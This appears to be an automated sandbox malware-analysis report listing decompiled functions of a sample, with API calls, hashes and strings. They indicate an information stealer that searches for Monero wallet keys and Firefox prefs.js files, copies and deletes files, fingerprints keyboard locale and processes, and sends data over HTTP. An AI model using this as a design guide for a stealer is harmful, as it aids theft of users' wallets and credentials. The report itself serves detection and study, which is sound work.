Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: e14eed257f15c0dc9e580a210d27f05918716627fd124034978af9ea2872c6d1
Instruction ID: 5a3fc47f830fac519a9ee9adc9cf6de0dab9a369f537e76f1d4ff80e5a9c74cb
Opcode Fuzzy Hash: e14eed257f15c0dc9e580a210d27f05918716627fd124034978af9ea2872c6d1
Instruction Fuzzy Hash: 8412FD71910118AAEB15FB91DC92FEEB339AF14304F50459FB10662091DFB82F99CB7A

Function 00483EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00483EC3
FindFirstFileA.KERNEL32(?,?), ref: 00483EDA
StrCmpCA.SHLWAPI(?,00490FAC), ref: 00483F08
StrCmpCA.SHLWAPI(?,00490FB0), ref: 00483F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 0048406C
FindClose.KERNEL32(000000FF), ref: 00484081

Strings

%s\%s, xrefs: 00483EB7

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 8f94e3f8707eff1eb19c5cf884c84ce55c6319b9948c5c5c84b4a87ea4c08590
Instruction ID: 81c2ba857cd64038bc1e4317fc0d0179afeeb61f1a1f50851f971a46365bc6c2
Opcode Fuzzy Hash: 8f94e3f8707eff1eb19c5cf884c84ce55c6319b9948c5c5c84b4a87ea4c08590
Instruction Fuzzy Hash: EA5185F2900218ABCB24FBB0DC85EEE737DBB44704F404A9DB61992040EB79DB858F95

Function 0047F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982

Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01109178,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004915B8,00490D96), ref: 0047F71E
StrCmpCA.SHLWAPI(?,004915BC), ref: 0047F76F
StrCmpCA.SHLWAPI(?,004915C0), ref: 0047F785
FindNextFileA.KERNELBASE(000000FF,?), ref: 0047FAB1
FindClose.KERNEL32(000000FF), ref: 0047FAC3

Strings

prefs.js, xrefs: 0047F812

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: b9ea37c1cadb1898d77b9fc79608950c27fcbb82eabd0e8fd07d75e9f9b90660
Instruction ID: b9e227305d7ec12db72660e25e8e78cce7e808b5da569ef58bdf94472b2d9d7f
Opcode Fuzzy Hash: b9ea37c1cadb1898d77b9fc79608950c27fcbb82eabd0e8fd07d75e9f9b90660
Instruction Fuzzy Hash: E9B184719001049BDB24FF61DC91BEE7379AF54304F0089AFE40A96151EF7CAB59CBAA

Function 004716D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0049510C,?,?,?,004951B4,?,?,00000000,?,00000000), ref: 00471923
StrCmpCA.SHLWAPI(?,0049525C), ref: 00471973
StrCmpCA.SHLWAPI(?,00495304), ref: 00471989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00471D40
DeleteFileA.KERNEL32(00000000), ref: 00471DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 00471E20
FindClose.KERNEL32(000000FF), ref: 00471E32

Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982

Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01109178,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

Strings

\*.*, xrefs: 004717F1

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 2d91b455e3fdaa9503cbdc8a1de69cc28621c552aa89287afbbb13201c1570b3
Instruction ID: 26ff79fcc37143082bf6cf4daa54e6abd2ef1a29614fbbc36f3004fc117305b4
Opcode Fuzzy Hash: 2d91b455e3fdaa9503cbdc8a1de69cc28621c552aa89287afbbb13201c1570b3
Instruction Fuzzy Hash: DC1232719101189AEB15FB61CC96AEE7378AF14304F4049DFB10A62091EF7C6F99CFA5

Function 0047DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982

Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01109178,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004914B0,00490C2A), ref: 0047DAEB
StrCmpCA.SHLWAPI(?,004914B4), ref: 0047DB33
StrCmpCA.SHLWAPI(?,004914B8), ref: 0047DB49
FindNextFileA.KERNELBASE(000000FF,?), ref: 0047DDCC
FindClose.KERNEL32(000000FF), ref: 0047DDDE

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 313800d5f67fe05b8f572dab5868c6299deabe35ae1cb6f5938f828f925b7bf6
Instruction ID: 5e2304b5bc2c92ff68ec59bc82474d467e8624b4345790d16c4f6722ce7bc2e8
Opcode Fuzzy Hash: 313800d5f67fe05b8f572dab5868c6299deabe35ae1cb6f5938f828f925b7bf6
Instruction Fuzzy Hash: 029177729101049BDB14FBB1DC569ED737DAF84304F008A6FF80A96141EE7CAB59CBA6

Function 00487B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

GetKeyboardLayoutList.USER32(00000000,00000000,004905AF), ref: 00487BE1
LocalAlloc.KERNEL32(00000040,?), ref: 00487BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 00487C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00487C62
LocalFree.KERNEL32(00000000), ref: 00487D22

Strings

/ , xrefs: 00487C7F

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: b443847c6f64ad037cfc24f6a5968467a3fdc156fd0151f39d102eb4382ebc08
Instruction ID: 90eb398c0de0dc9a64c2feb4b37dce4eb933fa3f34ffc50af2ed5d1adba31179
Opcode Fuzzy Hash: b443847c6f64ad037cfc24f6a5968467a3fdc156fd0151f39d102eb4382ebc08
Instruction Fuzzy Hash: D9417271900118ABDB24EF94DC99BEEB374FF44704F2045DAE00962180DB786F85CFA5

Function 0047E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982

Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01109178,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00490D73), ref: 0047E4A2
StrCmpCA.SHLWAPI(?,004914F8), ref: 0047E4F2
StrCmpCA.SHLWAPI(?,004914FC), ref: 0047E508
FindNextFileA.KERNEL32(000000FF,?), ref: 0047EBDF

Strings

\*.*, xrefs: 0047E44D

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: 3a894fc53cbd1f689a45bac3536a95ca65e7585d3353281c2cdb26b964030b02
Instruction ID: e152044c96f9c27055d3efb76722edf6ffdbaccc2db2207c56d7c8e9ad6cc483
Opcode Fuzzy Hash: 3a894fc53cbd1f689a45bac3536a95ca65e7585d3353281c2cdb26b964030b02
Instruction Fuzzy Hash: 2E1274719001189AEB14FB61DC96EED7338AF54304F4049AFB50A62091EF7C6F59CFAA

Function 00489600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0048961E
Process32First.KERNEL32(00490ACA,00000128), ref: 00489632
Process32Next.KERNEL32(00490ACA,00000128), ref: 00489647
StrCmpCA.SHLWAPI(?,00000000), ref: 0048965C
CloseHandle.KERNEL32(00490ACA), ref: 0048967A

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
